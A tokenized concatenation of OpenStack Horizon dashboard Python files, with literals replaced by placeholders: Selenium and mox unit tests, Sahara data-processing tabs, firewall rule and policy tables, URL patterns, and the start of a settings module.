nova_stu_enabled : <EOL> api . nova . usage_get ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , <EOL> start , end ) . AndReturn ( usage_obj ) <EOL> api . nova . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . limits [ '<STR_LIT>' ] ) <EOL> api . cinder . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . cinder_limits [ '<STR_LIT>' ] ) <EOL> self . _stub_neutron_api_calls ( ) <EOL> self . mox . ReplayAll ( ) <EOL> project_id = self . tenants . first ( ) . id <EOL> csv_url = reverse ( '<STR_LIT>' , <EOL> args = [ project_id ] ) + "<STR_LIT>" <EOL> res = self . client . get ( csv_url ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( res . context [ '<STR_LIT>' ] , usage . ProjectUsage ) ) <EOL> hdr = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' % hdr ) <EOL> @ unittest . skipUnless ( os . environ . get ( '<STR_LIT>' , False ) , <EOL> "<STR_LIT>" ) <EOL> class SeleniumTests ( test . SeleniumAdminTestCase ) : <EOL> @ test . create_stubs ( <EOL> { api . keystone : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } ) <EOL> def test_inline_editing_update ( self ) : <EOL> api . keystone . tenant_list ( IgnoreArg ( ) , <EOL> domain = None , <EOL> marker = None , <EOL> paginate = True ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> api . keystone . tenant_update ( <EOL> IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> description = '<STR_LIT>' , <EOL> enabled = True , <EOL> name = u'<STR_LIT>' ) <EOL> changed_tenant = copy . copy ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> changed_tenant . name = u'<STR_LIT>' <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( changed_tenant ) <EOL> self . mox . ReplayAll ( ) <EOL> self . selenium . get ( "<STR_LIT>" % ( self . live_server_url , INDEX_URL ) ) <EOL> td_element = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cell_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button = edit_button_wrapper . find_element_by_tag_name ( '<STR_LIT>' ) <EOL> action_chains = ActionChains ( self . selenium ) <EOL> action_chains . move_to_element ( cell_wrapper ) . click ( edit_button ) <EOL> action_chains . perform ( ) <EOL> wait = self . ui . WebDriverWait ( self . selenium , <NUM_LIT:10> , <EOL> ignored_exceptions = [ socket_timeout ] ) <EOL> wait . until ( lambda x : self . selenium . find_element_by_name ( "<STR_LIT>" ) ) <EOL> td_element = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> name_input = td_element . find_element_by_tag_name ( '<STR_LIT:input>' ) <EOL> name_input . send_keys ( keys . Keys . HOME ) <EOL> name_input . send_keys ( "<STR_LIT>" ) <EOL> td_element . find_element_by_class_name ( '<STR_LIT>' ) . click ( ) <EOL> wait = self . ui . WebDriverWait ( self . selenium , <NUM_LIT:10> , <EOL> ignored_exceptions = [ socket_timeout ] ) <EOL> wait . until ( lambda x : self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> data_wrapper = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTrue ( data_wrapper . text == u'<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ test . create_stubs ( <EOL> { api . keystone : ( '<STR_LIT>' , '<STR_LIT>' ) } ) <EOL> def test_inline_editing_cancel ( self ) : <EOL> api . keystone . tenant_list ( IgnoreArg ( ) , <EOL> domain = None , <EOL> marker = None , <EOL> paginate = True ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . keystone . tenant_get ( IgnoreArg ( ) , <EOL> u'<STR_LIT:1>' , <EOL> admin = True ) . AndReturn ( self . tenants . list ( ) [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> self . selenium . get ( "<STR_LIT>" % ( self . live_server_url , INDEX_URL ) ) <EOL> td_element = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cell_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button_wrapper = td_element . find_element_by_class_name ( <EOL> '<STR_LIT>' ) <EOL> edit_button = edit_button_wrapper . find_element_by_tag_name ( '<STR_LIT>' ) <EOL> action_chains = ActionChains ( self . selenium ) <EOL> action_chains . move_to_element ( cell_wrapper ) . click ( edit_button ) <EOL> action_chains . perform ( ) <EOL> wait = self . ui . WebDriverWait ( self . selenium , <NUM_LIT:10> , <EOL> ignored_exceptions = [ socket_timeout ] ) <EOL> wait . until ( lambda x : self . selenium . find_element_by_name ( "<STR_LIT>" ) ) <EOL> td_element = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> td_element . find_element_by_class_name ( '<STR_LIT>' ) . click ( ) <EOL> data_wrapper = self . selenium . find_element_by_xpath ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTrue ( data_wrapper . text == u'<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . base : ( '<STR_LIT>' , ) , <EOL> quotas : ( '<STR_LIT>' , ) } ) <EOL> def test_membership_list_loads_correctly ( self ) : <EOL> member_css_class = "<STR_LIT>" <EOL> users = self . users . list ( ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( False ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( False ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( self . domain ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( self . quotas . first ( ) ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( self . roles . first ( ) ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = self . domain . id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = self . domain . id ) . AndReturn ( self . groups . list ( ) ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . selenium . get ( "<STR_LIT>" % <EOL> ( self . live_server_url , <EOL> reverse ( '<STR_LIT>' ) ) ) <EOL> members = self . selenium . find_element_by_css_selector ( member_css_class ) <EOL> for user in users : <EOL> self . assertIn ( user . name , members . text ) </s>
<s> import logging <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import nova <EOL> from openstack_dashboard . api import sahara as saharaclient <EOL> from openstack_dashboard . dashboards . project . data_processing . utils import workflow_helpers as helpers <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class GeneralTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . cluster_template_get ( request , template_id ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template } <EOL> class NodeGroupsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . cluster_template_get ( request , template_id ) <EOL> for ng in template . node_groups : <EOL> if not ng [ "<STR_LIT>" ] : <EOL> continue <EOL> ng [ "<STR_LIT>" ] = ( <EOL> nova . flavor_get ( request , ng [ "<STR_LIT>" ] ) . name ) <EOL> ng [ "<STR_LIT>" ] = helpers . safe_call ( <EOL> saharaclient . nodegroup_template_get , <EOL> request , ng . get ( "<STR_LIT>" , None ) ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template } <EOL> class ClusterTemplateDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( GeneralTab , NodeGroupsTab , ) <EOL> sticky = True </s>
<s> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from mox import IsA <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> DETAILS_URL = reverse ( <EOL> '<STR_LIT>' , args = [ '<STR_LIT:id>' ] ) <EOL> class DataProcessingDataSourceTests ( test . TestCase ) : <EOL> @ test . create_stubs ( { api . sahara : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . sahara . data_source_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . data_sources . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT:Name>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> @ test . create_stubs ( { api . sahara : ( '<STR_LIT>' , ) } ) <EOL> def test_details ( self ) : <EOL> api . sahara . data_source_get ( IsA ( http . HttpRequest ) , IsA ( unicode ) ) . AndReturn ( self . data_sources . list ( ) [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( DETAILS_URL ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> self . assertContains ( res , '<STR_LIT>' ) <EOL> @ test . create_stubs ( { api . sahara : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_delete ( self ) : <EOL> data_source = self . data_sources . first ( ) <EOL> api . sahara . data_source_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . data_sources . list ( ) ) <EOL> api . sahara . data_source_delete ( IsA ( http . HttpRequest ) , data_source . id ) <EOL> self . mox . ReplayAll ( ) <EOL> form_data = { '<STR_LIT:action>' : '<STR_LIT>' % data_source . id } <EOL> res = self . client . post ( INDEX_URL , form_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) </s>
<s> import logging <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import network <EOL> from openstack_dashboard . api import nova <EOL> from openstack_dashboard . api import sahara as saharaclient <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class GeneralTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . nodegroup_template_get ( <EOL> request , template_id ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> flavor = nova . flavor_get ( request , template . flavor_id ) <EOL> except Exception : <EOL> flavor = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> floating_ip_pool_name = None <EOL> if template . floating_ip_pool : <EOL> try : <EOL> floating_ip_pool_name = self . _get_floating_ip_pool_name ( <EOL> request , template . floating_ip_pool ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template , "<STR_LIT>" : flavor , <EOL> "<STR_LIT>" : floating_ip_pool_name } <EOL> def _get_floating_ip_pool_name ( self , request , pool_id ) : <EOL> pools = [ pool for pool in network . floating_ip_pools_list ( <EOL> request ) if pool . id == pool_id ] <EOL> return pools [ <NUM_LIT:0> ] . name if pools else pool_id <EOL> class ConfigsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( <EOL> "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> template_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> template = saharaclient . nodegroup_template_get ( <EOL> request , template_id ) <EOL> except Exception : <EOL> template = { } <EOL> exceptions . handle ( request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { "<STR_LIT>" : template } <EOL> class NodegroupTemplateDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( GeneralTab , ConfigsTab , ) <EOL> sticky = True </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . template import defaultfilters as filters <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . translation import ungettext_lazy <EOL> from horizon import tables <EOL> from openstack_dashboard import policy <EOL> class AddRuleLink ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class AddPolicyLink ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class AddFirewallLink ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class DeleteRuleLink ( policy . PolicyTargetMixin , tables . DeleteAction ) : <EOL> name = "<STR_LIT>" <EOL> @ staticmethod <EOL> def action_present ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> @ staticmethod <EOL> def action_past ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class DeletePolicyLink ( policy . PolicyTargetMixin , tables . DeleteAction ) : <EOL> name = "<STR_LIT>" <EOL> @ staticmethod <EOL> def action_present ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> @ staticmethod <EOL> def action_past ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class DeleteFirewallLink ( policy . PolicyTargetMixin , <EOL> tables . DeleteAction ) : <EOL> name = "<STR_LIT>" <EOL> @ staticmethod <EOL> def action_present ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> @ staticmethod <EOL> def action_past ( count ) : <EOL> return ungettext_lazy ( <EOL> u"<STR_LIT>" , <EOL> u"<STR_LIT>" , <EOL> count <EOL> ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> class UpdateRuleLink ( policy . PolicyTargetMixin , tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , rule ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : rule . id } ) <EOL> return base_url <EOL> class UpdatePolicyLink ( policy . PolicyTargetMixin , tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , policy ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : policy . id } ) <EOL> return base_url <EOL> class UpdateFirewallLink ( policy . PolicyTargetMixin , tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , firewall ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : firewall . id } ) <EOL> return base_url <EOL> class InsertRuleToPolicyLink ( policy . PolicyTargetMixin , <EOL> tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , policy ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : policy . id } ) <EOL> return base_url <EOL> class RemoveRuleFromPolicyLink ( policy . PolicyTargetMixin , <EOL> tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" , ) <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def get_link_url ( self , policy ) : <EOL> base_url = reverse ( "<STR_LIT>" , <EOL> kwargs = { '<STR_LIT>' : policy . id } ) <EOL> return base_url <EOL> def get_rules_name ( datum ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( [ rule . name or rule . id [ : <NUM_LIT> ] <EOL> for rule in datum . rules ] ) <EOL> def get_policy_name ( datum ) : <EOL> if datum . policy : <EOL> return datum . policy . name or datum . policy . id <EOL> def get_policy_link ( datum ) : <EOL> return reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : datum . policy . id } ) <EOL> class RulesTable ( tables . DataTable ) : <EOL> name = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT:Name>" ) , <EOL> link = "<STR_LIT>" ) <EOL> protocol = tables . Column ( "<STR_LIT>" , <EOL> filters = ( lambda v : filters . default ( v , _ ( "<STR_LIT>" ) ) , <EOL> filters . upper , ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> source_ip_address = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> source_port = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> destination_ip_address = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> destination_port = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> action = tables . Column ( "<STR_LIT:action>" , <EOL> filters = ( filters . upper , ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> enabled = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> firewall_policy_id = tables . Column ( get_policy_name , <EOL> link = get_policy_link , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AddRuleLink , DeleteRuleLink ) <EOL> row_actions = ( UpdateRuleLink , DeleteRuleLink ) <EOL> class PoliciesTable ( tables . DataTable ) : <EOL> name = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT:Name>" ) , <EOL> link = "<STR_LIT>" ) <EOL> firewall_rules = tables . Column ( get_rules_name , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> audited = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AddPolicyLink , DeletePolicyLink ) <EOL> row_actions = ( UpdatePolicyLink , InsertRuleToPolicyLink , <EOL> RemoveRuleFromPolicyLink , DeletePolicyLink ) <EOL> class FirewallsTable ( tables . DataTable ) : <EOL> name = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT:Name>" ) , <EOL> link = "<STR_LIT>" ) <EOL> firewall_policy_id = tables . Column ( get_policy_name , <EOL> link = get_policy_link , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> status = tables . Column ( "<STR_LIT:status>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AddFirewallLink , DeleteFirewallLink ) <EOL> row_actions = ( UpdateFirewallLink , DeleteFirewallLink ) </s>
<s> from django . conf . urls import patterns <EOL> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . project . instances import views <EOL> INSTANCES = r'<STR_LIT>' <EOL> INSTANCES_KEYPAIR = r'<STR_LIT>' <EOL> VIEW_MOD = '<STR_LIT>' <EOL> urlpatterns = patterns ( <EOL> VIEW_MOD , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . LaunchInstanceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , views . UpdateView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , views . RebuildView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , views . ResizeView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES_KEYPAIR % '<STR_LIT>' , <EOL> views . DecryptPasswordView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tabs <EOL> class OverviewTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_context_data ( self , request ) : <EOL> port = self . tab_group . kwargs [ '<STR_LIT:port>' ] <EOL> return { '<STR_LIT:port>' : port } <EOL> class PortDetailTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( OverviewTab , ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard import api <EOL> class OverviewTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = '<STR_LIT>' <EOL> def get_context_data ( self , request ) : <EOL> port_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> port = api . neutron . port_get ( self . request , port_id ) <EOL> except Exception : <EOL> redirect = reverse ( self . failure_url ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> return { '<STR_LIT:port>' : port } <EOL> class PortDetailTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( OverviewTab , ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import cinder <EOL> class OverviewTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> try : <EOL> snapshot = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( request , snapshot . volume_id ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return { "<STR_LIT>" : snapshot , <EOL> "<STR_LIT>" : volume } <EOL> def get_redirect_url ( self ) : <EOL> return reverse ( '<STR_LIT>' ) <EOL> class SnapshotDetailTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( OverviewTab , ) </s>
<s> from django . conf . urls import patterns <EOL> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . router . nexus1000v import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . CreateNetworkProfileView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . UpdateNetworkProfileView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import logging <EOL> import os <EOL> import sys <EOL> import warnings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> import xstatic . main <EOL> import xstatic . pkg . angular <EOL> import xstatic . pkg . angular_cookies <EOL> import xstatic . pkg . angular_mock <EOL> import xstatic . pkg . bootstrap_datepicker <EOL> import xstatic . pkg . bootstrap_scss <EOL> import xstatic . pkg . d3 <EOL> import xstatic . pkg . font_awesome <EOL> import xstatic . pkg . hogan <EOL> import xstatic . pkg . jasmine <EOL> import xstatic . pkg . jquery <EOL> import xstatic . pkg . jquery_migrate <EOL> import xstatic . pkg . jquery_quicksearch <EOL> import xstatic . pkg . jquery_tablesorter <EOL> import xstatic . pkg . jquery_ui <EOL> import xstatic . pkg . jsencrypt <EOL> import xstatic . pkg . qunit <EOL> import xstatic . pkg . rickshaw <EOL> import xstatic . pkg . spin <EOL> from openstack_dashboard import exceptions <EOL> warnings . formatwarning = lambda message , category , * args , ** kwargs : '<STR_LIT>' % ( category . __name__ , message ) <EOL> ROOT_PATH = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> BIN_DIR = os . path . abspath ( os . path . join ( ROOT_PATH , '<STR_LIT:..>' , '<STR_LIT>' ) ) <EOL> if ROOT_PATH not in sys . path : <EOL> sys . path . append ( ROOT_PATH ) <EOL> DEBUG = False <EOL> TEMPLATE_DEBUG = DEBUG <EOL> SITE_BRANDING = '<STR_LIT>' <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGOUT_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT:/>' <EOL> MEDIA_ROOT = os . path . abspath ( os . path . join ( ROOT_PATH , '<STR_LIT:..>' , '<STR_LIT>' ) ) <EOL> MEDIA_URL = 